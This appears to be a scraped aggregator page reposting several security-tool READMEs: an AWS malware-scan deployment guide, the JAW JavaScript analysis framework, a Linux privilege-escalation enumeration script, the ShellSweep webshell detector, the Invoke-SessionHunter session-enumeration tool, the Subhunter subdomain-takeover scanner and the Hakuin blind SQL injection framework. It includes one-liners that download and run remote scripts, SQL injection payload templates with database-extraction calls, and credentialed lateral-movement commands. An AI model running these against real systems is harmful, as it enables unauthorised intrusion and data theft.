    Currently, Amazon GuardDuty Malware scan does not support EBS volumes encrypted with EBS-managed keys. If you want to use this solution to scan your on-prem (or other-cloud) servers replicated with DRS, you need to setup DRS replication with your own encryption key in KMS. If you are currently using EBS-managed keys with your replicating servers, you can change encryption settings to use your own KMS key in the DRS console.

Deploy

  1. Create a Cloud9 environment with an Ubuntu image (at least t3.small for better performance) in your AWS account. Open your Cloud9 environment and clone the code in this repository. Note: Amazon Linux 2 ships node v16, which is no longer supported since 2023-09-11.

     git clone https://github.com/aws-samples/drs-malware-scan

    cd drs-malware-scan

    sh check_loggroup.sh

  2. Deploy the CDK stack by running the following commands in the Cloud9 terminal and confirm the deployment

     npm install
     cdk bootstrap
     cdk deploy --all

     Note
     The solution is made of 2 stacks:
     * DrsMalwareScanStack: deploys all resources needed for the malware scanning feature. This stack is mandatory. If you want to deploy only this stack, you can run cdk deploy DrsMalwareScanStack
     * ScanReportStack: deploys the resources needed for reporting (AWS Lambda and Amazon S3). This stack is optional. If you want to deploy only this stack, you can run cdk deploy ScanReportStack

     If you want to deploy both stacks you can run cdk deploy --all

Troubleshooting

All lambda functions route logs to Amazon CloudWatch. You can verify the execution of each function by inspecting the proper CloudWatch log groups for each function, look for the /aws/lambda/DrsMalwareScanStack-* pattern.

The duration of the malware scan operation will depend on the number of servers/volumes to scan (and their size). When Amazon GuardDuty finds malware, it generates a SecurityHub finding: the solution intercepts this event and runs the $StackName-SecurityHubAnnotations lambda to augment the SecurityHub finding with a note containing the name(s) of the DRS source server(s) with malware.

The SQS FIFO queues can be monitored using the Messages available and Message in flight metrics from the AWS SQS console

The DRS Volume Annotations DynamoDB table keeps track of the status of each malware scan operation.

Amazon GuardDuty has documented reasons to skip scan operations. For further information please check Reasons for skipping resource during malware scan

In order to analyze logs from Amazon GuardDuty malware scan operations, you can check the /aws/guardduty/malware-scan-events Amazon CloudWatch log group. The default log retention period for this log group is 90 days, after which the log events are deleted automatically.

Cleanup

  1. Run the following commands in your terminal:

    cdk destroy --all

  2. (Optional) Delete the CloudWatch log groups associated with Lambda Functions.

AWS Cost Estimation Analysis

For the purpose of this analysis, we have assumed a fictitious scenario to take as an example. The following cost estimates are based on services located in the North Virginia (us-east-1) region.

Estimated scenario:

  • 2 Source Servers to replicate (DR) (Total Storage: 100GB - 4 disks)
  • 3 TB Malware Scanned/Month
  • 30 days of EBS snapshot Retention period
  • Daily Malware scans
| Monthly Cost | Total Cost for 12 Months |
|---|---|
| 171.22 USD | 2,054.74 USD |

Service Breakdown:

| Service Name | Description | Monthly Cost (USD) |
|---|---|---|
| AWS Elastic Disaster Recovery | 2 Source Servers / 1 Replication Server / 4 disks / 100GB / 30 days of EBS Snapshot Retention Period | 71.41 |
| Amazon GuardDuty | 3 TB Malware Scanned/Month | 94.56 |
| Amazon DynamoDB | 100MB / 1 Read/Second / 1 Write/Second | 3.65 |
| AWS Security Hub | 1 Account / 100 Security Checks / 1000 Findings Ingested | 0.10 |
| AWS EventBridge | 1M custom events | 1.00 |
| Amazon CloudWatch | 1GB ingested/month | 0.50 |
| AWS Lambda | 5 ARM Lambda Functions - 128MB / 10secs | 0.00 |
| Amazon SQS | 2 SQS FIFO queues | 0.00 |
| Total | | 171.22 |

Note The figures presented here are estimates based on the assumptions described above, derived from the AWS Pricing Calculator. For further details please check this pricing calculator as a reference. You can adjust the services configuration in the referenced calculator to make your own estimation. This estimation does not include potential taxes or additional charges that might be applicable. It's crucial to remember that actual fees can vary based on usage and any additional services not covered in this analysis. For critical environments it is advisable to include a Business Support Plan (not considered in this estimation).

Security

See CONTRIBUTING for more information.

Authors



JAW - A Graph-based Security Analysis Framework For Client-side JavaScript

By: Zion3R

An open-source, prototype implementation of property graphs for JavaScript based on the esprima parser, and the EsTree SpiderMonkey Spec. JAW can be used for analyzing the client-side of web applications and JavaScript-based programs.

This project is licensed under GNU AFFERO GENERAL PUBLIC LICENSE V3.0. See here for more information.

JAW has a Github pages website available at https://soheilkhodayari.github.io/JAW/.

Release Notes:


Overview of JAW

The architecture of the JAW is shown below.

Test Inputs

JAW can be used in two distinct ways:

  1. Arbitrary JavaScript Analysis: Utilize JAW for modeling and analyzing any JavaScript program by specifying the program's file system path.

  2. Web Application Analysis: Analyze a web application by providing a single seed URL.

Data Collection

  • JAW features several JavaScript-enabled web crawlers for collecting web resources at scale.

HPG Construction

  • Use the collected web resources to create a Hybrid Program Graph (HPG), which will be imported into a Neo4j database.

  • Optionally, supply the HPG construction module with a mapping of semantic types to custom JavaScript language tokens, facilitating the categorization of JavaScript functions based on their purpose (e.g., HTTP request functions).

Analysis and Outputs

  • Query the constructed Neo4j graph database for various analyses. JAW offers utility traversals for data flow analysis, control flow analysis, reachability analysis, and pattern matching. These traversals can be used to develop custom security analyses.

  • JAW also includes built-in traversals for detecting client-side CSRF, DOM Clobbering and request hijacking vulnerabilities.

  • The outputs will be stored in the same folder as that of input.

Setup

The installation script relies on the following prerequisites:
  • Latest version of the npm package manager (Node.js)
  • Any stable version of Python 3.x
  • The Python pip package manager

Afterwards, install the necessary dependencies via:

$ ./install.sh

For detailed installation instructions, please see here.

Quick Start

Running the Pipeline

You can run an instance of the pipeline in a background screen via:

$ python3 -m run_pipeline --conf=config.yaml

The CLI provides the following options:

$ python3 -m run_pipeline -h

usage: run_pipeline.py [-h] [--conf FILE] [--site SITE] [--list LIST] [--from FROM] [--to TO]

This script runs the tool pipeline.

optional arguments:
-h, --help show this help message and exit
--conf FILE, -C FILE pipeline configuration file. (default: config.yaml)
--site SITE, -S SITE website to test; overrides config file (default: None)
--list LIST, -L LIST site list to test; overrides config file (default: None)
--from FROM, -F FROM the first entry to consider when a site list is provided; overrides config file (default: -1)
--to TO, -T TO the last entry to consider when a site list is provided; overrides config file (default: -1)

Input Config: JAW expects a .yaml config file as input. See config.yaml for an example.

Hint. The config file specifies different passes (e.g., crawling, static analysis, etc) which can be enabled or disabled for each vulnerability class. This allows running the tool building blocks individually, or in a different order (e.g., crawl all webapps first, then conduct security analysis).

Quick Example

For running a quick example demonstrating how to build a property graph and run Cypher queries over it, do:

$ python3 -m analyses.example.example_analysis --input=$(pwd)/data/test_program/test.js

Crawling and Data Collection

This module collects the data (i.e., JavaScript code and state values of web pages) needed for testing. If you want to test a specific JavaScript file that you already have on your file system, you can skip this step.

JAW has crawlers based on Selenium (JAW-v1), Puppeteer (JAW-v2, v3) and Playwright (JAW-v3). For most up-to-date features, it is recommended to use the Puppeteer- or Playwright-based versions.

Playwright CLI with Foxhound

This web crawler employs foxhound, an instrumented version of Firefox, to perform dynamic taint tracking as it navigates through webpages. To start the crawler, do:

$ cd crawler
$ node crawler-taint.js --seedurl=https://google.com --maxurls=100 --headless=true --foxhoundpath=<optional-foxhound-executable-path>

The foxhoundpath is by default set to the following directory: crawler/foxhound/firefox which contains a binary named firefox.

Note: you need a build of foxhound to use this version. An ubuntu build is included in the JAW-v3 release.

Puppeteer CLI

To start the crawler, do:

$ cd crawler
$ node crawler.js --seedurl=https://google.com --maxurls=100 --browser=chrome --headless=true

See here for more information.

Selenium CLI

To start the crawler, do:

$ cd crawler/hpg_crawler
$ vim docker-compose.yaml # set the websites you want to crawl here and save
$ docker-compose build
$ docker-compose up -d

Please refer to the documentation of the hpg_crawler here for more information.

Graph Construction

HPG Construction CLI

To generate an HPG for a given (set of) JavaScript file(s), do:

$ node engine/cli.js  --lang=js --graphid=graph1 --input=/in/file1.js --input=/in/file2.js --output=$(pwd)/data/out/ --mode=csv

optional arguments:
--lang: language of the input program
--graphid: an identifier for the generated HPG
--input: path of the input program(s)
--output: path of the output HPG, must be i
--mode: determines the output format (csv or graphML)

HPG Import CLI

To import an HPG inside a neo4j graph database (docker instance), do:

$ python3 -m hpg_neo4j.hpg_import --rpath=<path-to-the-folder-of-the-csv-files> --id=<xyz> --nodes=<nodes.csv> --edges=<rels.csv>
$ python3 -m hpg_neo4j.hpg_import -h

usage: hpg_import.py [-h] [--rpath P] [--id I] [--nodes N] [--edges E]

This script imports a CSV of a property graph into a neo4j docker database.

optional arguments:
-h, --help show this help message and exit
--rpath P relative path to the folder containing the graph CSV files inside the `data` directory
--id I an identifier for the graph or docker container
--nodes N the name of the nodes csv file (default: nodes.csv)
--edges E the name of the relations csv file (default: rels.csv)

HPG Construction and Import CLI (v1)

In order to create a hybrid property graph for the output of the hpg_crawler and import it inside a local neo4j instance, you can also do:

$ python3 -m engine.api <path> --js=<program.js> --import=<bool> --hybrid=<bool> --reqs=<requests.out> --evts=<events.out> --cookies=<cookies.pkl> --html=<html_snapshot.html>

Specification of Parameters:

  • <path>: absolute path to the folder containing the program files for analysis (must be under the engine/outputs folder).
  • --js=<program.js>: name of the JavaScript program for analysis (default: js_program.js).
  • --import=<bool>: whether the constructed property graph should be imported to an active neo4j database (default: true).
  • --hybrid=<bool>: whether the hybrid mode is enabled (default: false). This implies that the tester wants to enrich the property graph by inputting files for any of the HTML snapshot, fired events, HTTP requests and cookies, as collected by the JAW crawler.
  • --reqs=<requests.out>: for hybrid mode only, name of the file containing the sequence of observed network requests, pass the string false to exclude (default: request_logs_short.out).
  • --evts=<events.out>: for hybrid mode only, name of the file containing the sequence of fired events, pass the string false to exclude (default: events.out).
  • --cookies=<cookies.pkl>: for hybrid mode only, name of the file containing the cookies, pass the string false to exclude (default: cookies.pkl).
  • --html=<html_snapshot.html>: for hybrid mode only, name of the file containing the DOM tree snapshot, pass the string false to exclude (default: html_rendered.html).

For more information, you can use the help CLI provided with the graph construction API:

$ python3 -m engine.api -h

Security Analysis

The constructed HPG can then be queried using Cypher or the NeoModel ORM.

Running Custom Graph traversals

You should place and run your queries in analyses/<ANALYSIS_NAME>.

Option 1: Using the NeoModel ORM (Deprecated)

You can use the NeoModel ORM to query the HPG. To write a query:

  • (1) Check out the HPG data model and syntax tree.
  • (2) Check out the ORM model for HPGs
  • (3) See the example query file provided; example_query_orm.py in the analyses/example folder.
$ python3 -m analyses.example.example_query_orm  

For more information, please see here.

Option 2: Using Cypher Queries

You can use Cypher to write custom queries. For this:

  • (1) Check out the HPG data model and syntax tree.
  • (2) See the example query file provided; example_query_cypher.py in the analyses/example folder.
$ python3 -m analyses.example.example_query_cypher

For more information, please see here.
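For flavor, a minimal neo4j Python driver sketch of such a query script is shown below. The connection details and the property name are placeholders, not JAW's actual HPG schema; consult the HPG data model for the real node labels:

from neo4j import GraphDatabase

driver = GraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "password"))

# Hypothetical query: count call-expression nodes in the imported graph.
QUERY = "MATCH (n {Type: 'CallExpression'}) RETURN count(n) AS calls"

with driver.session() as session:
    record = session.run(QUERY).single()
    print(record["calls"])

driver.close()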

Vulnerability Detection

This section describes how to configure and use JAW for vulnerability detection, and how to interpret the output. JAW contains, among others, self-contained queries for detecting client-side CSRF and DOM Clobbering.

Step 1. Enable the analysis component for the vulnerability class in the input config.yaml file:

request_hijacking:
  enabled: true
  # [...]

domclobbering:
  enabled: false
  # [...]

cs_csrf:
  enabled: false
  # [...]

Step 2. Run an instance of the pipeline with:

$ python3 -m run_pipeline --conf=config.yaml

Hint. You can run multiple instances of the pipeline under different screens:

$ screen -dmS s1 bash -c 'python3 -m run_pipeline --conf=conf1.yaml; exec sh'
$ screen -dmS s2 bash -c 'python3 -m run_pipeline --conf=conf2.yaml; exec sh'
$ # [...]

To generate parallel configuration files automatically, you may use the generate_config.py script.

How to Interpret the Output of the Analysis?

The outputs will be stored in a file called sink.flows.out in the same folder as that of the input. For Client-side CSRF, for example, for each HTTP request detected, JAW outputs an entry marking the set of semantic types (a.k.a. semantic tags or labels) associated with the elements constructing the request (i.e., the program slices). For example, an HTTP request marked with the semantic type ['WIN.LOC'] is forgeable through the window.location injection point. However, a request marked with ['NON-REACH'] is not forgeable.

An example output entry is shown below:

[*] Tags: ['WIN.LOC']
[*] NodeId: {'TopExpression': '86', 'CallExpression': '87', 'Argument': '94'}
[*] Location: 29
[*] Function: ajax
[*] Template: ajaxloc + "/bearer1234/"
[*] Top Expression: $.ajax({ xhrFields: { withCredentials: "true" }, url: ajaxloc + "/bearer1234/" })

1:['WIN.LOC'] variable=ajaxloc
0 (loc:6)- var ajaxloc = window.location.href

This entry shows that on line 29, there is a $.ajax call expression, and this call expression triggers an ajax request with the URL template value of ajaxloc + "/bearer1234/", where the parameter ajaxloc is a program slice reading its value at line 6 from window.location.href, thus forgeable through ['WIN.LOC'].

Test Web Application

In order to streamline the testing process for JAW and ensure that your setup is accurate, we provide a simple node.js web application which you can test JAW with.

First, install the dependencies via:

$ cd tests/test-webapp
$ npm install

Then, run the application in a new screen:

$ screen -dmS jawwebapp bash -c 'PORT=6789 npm run devstart; exec sh'

Detailed Documentation.

For more information, visit our wiki page here. Below is a table of contents for quick access.

The Web Crawler of JAW

Data Model of Hybrid Property Graphs (HPGs)

Graph Construction

Graph Traversals

Contribution and Code Of Conduct

Pull requests are always welcome. This project is intended to be a safe, welcoming space, and contributors are expected to adhere to the contributor code of conduct.

Academic Publication

If you use the JAW for academic research, we encourage you to cite the following paper:

@inproceedings{JAW,
  title = {JAW: Studying Client-side CSRF with Hybrid Property Graphs and Declarative Traversals},
  author = {Soheil Khodayari and Giancarlo Pellegrino},
  booktitle = {30th {USENIX} Security Symposium ({USENIX} Security 21)},
  year = {2021},
  address = {Vancouver, B.C.},
  publisher = {{USENIX} Association},
}

Acknowledgements

JAW has come a long way and we want to give our contributors a well-deserved shoutout here!

@tmbrbr, @c01gide, @jndre, and Sepehr Mirzaei.



Linux-Smart-Enumeration - Linux Enumeration Tool For Pentesting And CTFs With Verbosity Levels

By: Zion3R


First, a couple of useful oneliners ;)

wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

Note that since version 2.10 you can serve the script to other hosts with the -S flag!


linux-smart-enumeration

Linux enumeration tools for pentesting and CTFs

This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.

Unlike LinEnum, lse tries to gradually expose the information depending on its importance from a privesc point of view.

What is it?

This shell script will show relevant information about the security of the local Linux system, helping to escalate privileges.

From version 2.0 it is mostly POSIX compliant and tested with shellcheck and posh.

It can also monitor processes to discover recurrent program executions. It monitors while it is executing all the other tests, so you save some time. By default it monitors for 1 minute, but you can choose the watch time with the -p parameter.

It has 3 levels of verbosity so you can control how much information you see.

In the default level you should see the highly important security flaws in the system. The level 1 (./lse.sh -l1) shows interesting information that should help you to privesc. The level 2 (./lse.sh -l2) will just dump all the information it gathers about the system.

By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.

How to use it?

The idea is to get the information gradually.

First you should execute it just like ./lse.sh. If you see some green yes!, you probably already have some good stuff to work with.

If not, you should try the level 1 verbosity with ./lse.sh -l1 and you will see some more information that can be interesting.

If that does not help, level 2 will just dump everything you can gather about the service using ./lse.sh -l2. In this case you might find it useful to use ./lse.sh -l2 | less -r.

You can also select what tests to execute by passing the -s parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro will execute the test usr010 and all the tests in the sections net and pro.

Use: ./lse.sh [options]

OPTIONS
-c Disable color
-i Non interactive mode
-h This help
-l LEVEL Output verbosity level
0: Show highly important results. (default)
1: Show interesting results.
2: Show all gathered information.
-s SELECTION Comma separated list of sections or tests to run. Available
sections:
usr: User related tests.
sud: Sudo related tests.
fst: File system related tests.
sys: System related tests.
sec: Security measures related tests.
ret: Recurrent tasks (cron, timers) related tests.
net: Network related tests.
srv: Services related tests.
pro: Processes related tests.
sof: Software related tests.
ctn: Container (docker, lxc) related tests.
cve: CVE related tests.
Specific tests can be used with their IDs (i.e.: usr020,sud)
-e PATHS Comma separated list of paths to exclude. This allows you
to do faster scans at the cost of completeness
-p SECONDS Time that the process monitor will spend watching for
processes. A value of 0 will disable any watch (default: 60)
-S Serve the lse.sh script in this host so it can be retrieved
from a remote host.

Is it pretty?

Usage demo

Also available in webm video


Level 0 (default) output sample


Level 1 verbosity output sample


Level 2 verbosity output sample


Examples

Direct execution oneliners

bash <(wget -q -O - "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l2 -i
bash <(curl -s "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l1 -i


ShellSweep - PowerShell/Python/Lua Tool Designed To Detect Potential Webshell Files In A Specified Directory

By: Zion3R

ShellSweep

ShellSweeping the evil

Why ShellSweep

"ShellSweep" is a PowerShell/Python/Lua tool designed to detect potential webshell files in a specified directory.

ShellSweep and its suite of tools calculate the entropy of file contents to estimate the likelihood of a file being a webshell. High entropy indicates more randomness, which is a characteristic of the encrypted or obfuscated code often found in webshells.

  • It only processes files with certain extensions (.asp, .aspx, .asph, .php, .jsp), which are commonly used in webshells.
  • Certain directories can be excluded from scanning.
  • Files with certain hashes can be ignored during the scan.


How does ShellSweep find the shells?

Entropy, in the context of information theory or data science, is a measure of the unpredictability, randomness, or disorder in a set of data. The concept was introduced by Claude Shannon in his 1948 paper "A Mathematical Theory of Communication".

When applied to a file or a string of text, entropy can help assess the randomness of the data. Here's how it works: If a file consists of completely random data (each byte is just as likely to be any value between 0 and 255), the entropy is high, close to 8 (since log2(256) = 8).

If a file consists of highly structured data (for example, a text file where most bytes are ASCII characters), the entropy is lower.

In the context of finding webshells or malicious files, entropy can be a useful indicator:

  • Many obfuscated scripts or encrypted payloads have high entropy because the obfuscation or encryption process makes the data look random.
  • A normal text file or HTML file generally has lower entropy because human-readable text has patterns and structure (certain letters are more common, words are usually separated by spaces, etc.).

So, a file with unusually high entropy might be suspicious and worth further investigation. However, it's not a surefire indicator of maliciousness -- there are plenty of legitimate reasons a file might have high entropy, and plenty of ways malware might avoid causing high entropy. It's just one tool in a larger toolbox for detecting potential threats.

ShellSweep includes a Get-Entropy function that calculates the entropy of a file's contents by:

  • Counting how often each character appears in the file.
  • Using these frequencies to calculate the probability of each character.
  • Summing -p*log2(p) for each character, where p is the character's probability. This is the formula for entropy in information theory.
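Get-Entropy itself is PowerShell, but the same calculation is small enough to sketch in Python; the file name below is a placeholder.

# Shannon entropy of a file's bytes, from 0.0 (constant) to 8.0 (random).
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())

with open("suspect.aspx", "rb") as f:  # placeholder path
    print(round(shannon_entropy(f.read()), 4))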

ShellScan

ShellScan provides the ability to scan multiple known bad webshell directories and output the average, median, minimum and maximum entropy values by file extension.

Pass ShellScan.ps1 some directories of webshells, any size set. I used:

  • https://github.com/tennc/webshell
  • https://github.com/BlackArch/webshells
  • https://github.com/tarwich/jackal/blob/master/libraries/

This will give a decent training set to get entropy values.

Output example:

Statistics for .aspx files:
Average entropy: 4.94212121048115
Minimum entropy: 1.29348709979974
Maximum entropy: 6.09830238020383
Median entropy: 4.85437969842084
Statistics for .asp files:
Average entropy: 5.51268104400858
Minimum entropy: 0.732406213077191
Maximum entropy: 7.69241278153711
Median entropy: 5.57351177724806

ShellCSV

First, let's break down the usage of ShellCSV and how it assists with identifying the entropy of the good files on disk. The idea is that defenders can run this on web servers to gather all files and entropy values to better understand what paths and extensions are most prominent in their working environment.

See ShellCSV.csv as example output.

ShellSweep

First, choose your flavor: Python, PowerShell or Lua.

  • Based on results from ShellScan or ShellCSV, modify entropy values as needed.
  • Modify file extensions as needed. No need to look for ASPX on a non-ASPX app.
  • Modify paths. I don't recommend just scanning all of C:\; lots to filter.
  • Modify any filters needed.
  • Run it!

If you made it here, this is the part where you iterate on tuning. Find new shell? Gather entropy and modify as needed.

Questions

Feel free to open a Git issue.

Thank You

If you enjoyed this project, be sure to star the project and share with your family and friends.



Invoke-SessionHunter - Retrieve And Display Information About Active User Sessions On Remote Computers (No Admin Privileges Required)

By: Zion3R


Retrieve and display information about active user sessions on remote computers. No admin privileges required.

The tool leverages the remote registry service to query the HKEY_USERS registry hive on the remote computers. It identifies and extracts Security Identifiers (SIDs) associated with active user sessions, and translates these into corresponding usernames, offering insights into who is currently logged in.
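The underlying technique can be sketched in a few lines; the Python below (Windows-only, pywin32 required) enumerates SIDs under HKEY_USERS on a remote host and resolves them to usernames. Invoke-SessionHunter itself is PowerShell, and the target host name here is an assumption.

# Rough sketch of the remote-registry session enumeration idea.
import winreg
import win32security  # pywin32

TARGET = r"\\Workstation01"  # hypothetical target host

hive = winreg.ConnectRegistry(TARGET, winreg.HKEY_USERS)
index = 0
while True:
    try:
        sid_str = winreg.EnumKey(hive, index)
    except OSError:  # no more subkeys
        break
    index += 1
    # Session hives look like S-1-5-21-...; skip the *_Classes duplicates.
    if sid_str.startswith("S-1-5-21-") and not sid_str.endswith("_Classes"):
        sid = win32security.ConvertStringSidToSid(sid_str)
        name, domain, _ = win32security.LookupAccountSid(None, sid)
        print(f"{TARGET}: {domain}\\{name}")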

If the -CheckAsAdmin switch is provided, it will gather sessions by authenticating to targets where you have local admin access using Invoke-WMIRemoting (which will most likely retrieve more results).

It's important to note that the remote registry service needs to be running on the remote computer for the tool to work effectively. In my tests, if the service is stopped but its Startup type is configured to "Automatic" or "Manual", the service will start automatically on the target computer once queried (this is native behavior), and session information will be retrieved. If set to "Disabled", no session information can be retrieved from the target.


Usage:

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Invoke-SessionHunter/main/Invoke-SessionHunter.ps1')

If run without parameters or switches it will retrieve active sessions for all computers in the current domain by querying the registry

Invoke-SessionHunter

Gather sessions by authenticating to targets where you have local admin access

Invoke-SessionHunter -CheckAsAdmin

You can optionally provide credentials in the following format

Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!"

You can also use the -FailSafe switch, which will direct the tool to proceed if the target remote registry becomes unresponsive.

This works in combination with -Timeout (default = 2); increase it for slower networks.

Invoke-SessionHunter -FailSafe
Invoke-SessionHunter -FailSafe -Timeout 5

Use the -Match switch to show only targets where you have admin access and a privileged user is logged in

Invoke-SessionHunter -Match

All switches can be combined

Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!" -FailSafe -Timeout 5 -Match

Specify the target domain

Invoke-SessionHunter -Domain contoso.local

Specify a comma-separated list of targets or the full path to a file containing a list of targets - one per line

Invoke-SessionHunter -Targets "DC01,Workstation01.contoso.local"
Invoke-SessionHunter -Targets c:\Users\Public\Documents\targets.txt

Retrieve and display information about active user sessions on servers only

Invoke-SessionHunter -Servers

Retrieve and display information about active user sessions on workstations only

Invoke-SessionHunter -Workstations

Show active session for the specified user only

Invoke-SessionHunter -Hunt "Administrator"

Include localhost in the sessions retrieval (localhost is excluded by default)

Invoke-SessionHunter -IncludeLocalHost

Return custom PSObjects instead of table-formatted results

Invoke-SessionHunter -RawResults

Do not run a port scan to enumerate for alive hosts before trying to retrieve sessions

Note: if a host is not reachable it will hang for a while

Invoke-SessionHunter -NoPortScan


Subhunter - A Fast Subdomain Takeover Tool

By: Zion3R


Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. Typically, this happens when the subdomain has a CNAME record in the DNS but no host is providing content for it. Subhunter takes a given list of subdomains and scans them to check for this vulnerability.
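Subhunter itself is written in Go and matches service fingerprints, but the core dangling-CNAME check can be sketched with dnspython; the hostname below is a placeholder and fingerprinting is omitted.

# Toy dangling-CNAME check: flag subdomains whose CNAME target no longer resolves.
import dns.exception
import dns.resolver

def dangling_cname(subdomain: str) -> bool:
    try:
        target = dns.resolver.resolve(subdomain, "CNAME")[0].target.to_text()
    except dns.exception.DNSException:
        return False  # no CNAME record at all
    try:
        dns.resolver.resolve(target, "A")
        return False  # CNAME target still resolves
    except dns.resolver.NXDOMAIN:
        return True   # target is gone: takeover candidate
    except dns.exception.DNSException:
        return False

print(dangling_cname("sub.example.com"))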


Features:

  • Auto update
  • Uses random user agents
  • Built in Go
  • Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)

Installation:

Option 1:

Download from releases

Option 2:

Build from source:

$ git clone https://github.com/Nemesis0U/Subhunter.git
$ go build subhunter.go

Usage:

Options:

Usage of subhunter:
-l string
File including a list of hosts to scan
-o string
File to save results
-t int
Number of threads for scanning (default 50)
-timeout int
Timeout in seconds (default 20)

Demo (Added fake fingerprint for POC):

./Subhunter -l subdomains.txt -o test.txt

____ _ _ _
/ ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
\___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
|____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|


A fast subdomain takeover tool

Created by Nemesis

Loaded 88 fingerprints for current scan

-----------------------------------------------------------------------------

[+] Nothing found at www.ubereats.com: Not Vulnerable
[+] Nothing found at testauth.ubereats.com: Not Vulnerable
[+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
[+] Nothing found at about.ubereats.com: Not Vulnerable
[+] Nothing found at beta.ubereats.com: Not Vulnerable
[+] Nothing found at ewp.ubereats.com: Not Vulnerable
[+] Nothing found at edgetest.ubereats.com: Not Vulnerable
[+] Nothing found at guest.ubereats.com: Not Vulnerable
[+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
[+] Nothing found at info.ubereats.com: Not Vulnerable
[+] Nothing found at learn.ubereats.com: Not Vulnerable
[+] Nothing found at merchants.ubereats.com: Not Vulnerable
[+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
[+] Nothing found at messages.ubereats.com: Not Vulnerable
[+] Nothing found at order.ubereats.com: Not Vulnerable
[+] Nothing found at restaurants.ubereats.com: Not Vulnerable
[+] Nothing found at payments.ubereats.com: Not Vulnerable
[+] Nothing found at static.ubereats.com: Not Vulnerable

Subhunter exiting...
Results written to test.txt




Hakuin - A Blazing Fast Blind SQL Injection Optimization And Automation Framework

By: Zion3R


Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

Hakuin has been presented at esteemed academic and industrial conferences:

  • BlackHat MEA, Riyadh, 2023
  • Hack in the Box, Phuket, 2023
  • IEEE S&P Workshop on Offensive Technology (WOOT), 2023

More information can be found in our paper and slides.


Installation

To install Hakuin, simply run:

pip3 install hakuin

Developers should install the package locally and set the -e flag for editable mode:

git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .

Examples

Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from Requester and override the request method. The method must also determine whether the query resolved to True or False.

Example 1 - Query Parameter Injection with Status-based Inference
import aiohttp
from hakuin import Requester

class StatusRequester(Requester):
    async def request(self, ctx, query):
        # aiohttp no longer offers module-level get(); use a ClientSession.
        async with aiohttp.ClientSession() as session:
            async with session.get(f'http://vuln.com/?n=XXX" OR ({query}) --') as r:
                return r.status == 200
Example 2 - Header Injection with Content-based Inference
class ContentRequester(Requester):
    async def request(self, ctx, query):
        headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
        async with aiohttp.ClientSession() as session:
            async with session.get('http://vuln.com/', headers=headers) as r:
                return 'found' in await r.text()

To start extracting data, use the Extractor class. It requires a DBMS object to construct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

class StatusRequester(Requester):
    ...

async def main():
    # requester: Use this Requester
    # dbms:      Use this DBMS
    # n_tasks:   Spawns N tasks that extract column rows in parallel
    ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
    ...

if __name__ == '__main__':
    asyncio.get_event_loop().run_until_complete(main())

Now that everything is set, you can start extracting DB metadata.

Example 1 - Extracting DB Schemas
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
Example 2 - Extracting Tables
tables = await ext.extract_table_names(strategy='model')
Example 3 - Extracting Columns
columns = await ext.extract_column_names(table='users', strategy='model')
Example 4 - Extracting Tables and Columns Together
metadata = await ext.extract_meta(strategy='model')

Once you know the structure, you can extract the actual content.

Example 1 - Extracting Generic Columns
# text_strategy:    Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
Example 2 - Extracting Textual Columns
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
Example 3 - Extracting Integer Columns
res = await ext.extract_column_int(table='users', column='id')
Example 4 - Extracting Float Columns
res = await ext.extract_column_float(table='products', column='price')
Example 5 - Extracting Blob (Binary Data) Columns
res = await ext.extract_column_blob(table='users', column='id')

More examples can be found in the tests directory.

Using Hakuin from the Command Line

Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:
